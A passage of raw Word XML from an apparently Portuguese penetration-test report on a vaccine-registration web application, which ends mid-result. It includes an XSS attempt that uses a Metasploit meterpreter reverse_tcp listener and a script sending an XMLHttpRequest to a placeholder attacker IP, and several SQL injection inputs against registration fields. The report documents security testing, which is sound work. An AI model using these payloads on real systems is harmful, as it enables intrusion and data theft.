        <w:t>Iteração 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="993"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="005F6E06" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explorar XSS – Tela Cadastro L</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6E06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>otes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Vacinas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dia 27/04/16.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Duração: 2 horas.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Objetivo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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Explorar vulnerabilidade de XSS encontrado na tela Cadastro Lotes de Vacinas na Iteração 3.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color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultados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751591" w:rsidRDefault="00751591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751591" w:rsidRDefault="00751591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751591" w:rsidRDefault="00751591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Tentativa 1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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>A partir da máquina virtual que usa o Kali Linux, abrir uma conexão do Sistema de Vacinas fazendo uso de um listener da ferramenta Metasploit para acessar o sistema operacional que hospeda a aplicação.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[PASSOS INCLUSOS]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Passos utilizados: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Pr="00E52417" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:num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 w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Através do exploit disponível em </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit/Multi/Handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>com o payload windows-meterpreter-reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>usar o Metasploit para abrir um listener na porta 444 da máquina virtual que usa o Kali Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E52417" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:num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 w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Usar um comando GET de Javascript para abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual que usa Kali na porta indicada.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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Dessa forma, será criado um listener que fica ouvindo conexões. Quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp que abre uma conexão reversa da máquina atacada para a máquina atacante.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  <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3730D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Comando utilizado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="220"/>
        <w:ind w:left="2844"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="220"/>
        <w:ind w:left="2844"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r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 xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="220"/>
        <w:ind w:left="2844"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r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>r.open(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r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>,’http://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r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>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="220"/>
        <w:ind w:left="2844"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="181A1C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.send();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84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&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>script&gt;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84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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00E77F75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O navegador bloqueia a requisição</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando o filtro de CORS [6</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:tab/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E77F75" w:rsidRDefault="00E77F75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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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26.jpe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046E12" w:rsidRDefault="009A2041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Figura 26</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Erro exibido no navegador na execução da requisição usando</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o filtro de CORS.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Tentativa 2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Rodar o mesmo script utilizado na Tentativa 1 em um navegador diferente, para descobrir se o bloqueio da conexão ocorre em qualquer navegador ou apenas no Iceweasel.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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00650630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Ao utilizar o navegador Firefox, o filtro de CORS impede a conexão.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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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26.jpe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650630" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after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Figura 27</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00650630">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Navegador Firefox impede a conexão quando o filtro de CORS é utilizado.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Pr="006A38D8" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A38D8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Cadastro Servidor – Exploração via SQL Injection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dia 26/04/16.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Duração: 1 hora e 30 minutos.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Objetivo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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página Cadastro Servidor na tentativa de forçar ações não autorizadas no sistema.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jc w:val="center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Resultados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Tentativa 1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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00857C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>” é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.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Foi esperado que o sistema realizasse o tratamento do caractere aspa simples como um parâmetro regular da consulta.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Entrada: teste ‘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lastRenderedPageBreak/>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: Passou no teste. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de “</w:t>
      </w:r>
      <w:r w:rsidRPr="00857C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>”.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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 2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 w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>cadastrados. Comentários inline foram</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Entradas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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 --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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1  #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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados. 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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tentativa 3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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">É possível que a tela utilize Javascript para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">o funcionamento do Javascript foi desabilitado </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">no browser em utilização. Após isso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>foram</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> repetidos os procedimentos das tentativas 1 e 2. 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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Entradas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">teste ‘ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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highlight w:val="yellow"/>
          <w:lang w:val="en-US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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema não realizasse o tratamento de todos os caracteres informados como parâmetros regulares da consulta, então um erro fosse exibido na aplicação.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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Não p</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste. Nada aconteceu. Com o Javascript desabilitado no navegador a página não realizou nenhuma requisição.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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tentativa 4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 w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">a função de </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Javascript habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> no campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.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654DEF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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entradas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1231 ); select * from usuarios; --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>); select * from usuarios; #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE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lang w:val="en-US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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Foi esperado que o sistema não realizasse o tratamento de todos os caracteres informados como parâmetros regulares da consulta, então um erro fosse exibido na aplicação.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 w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
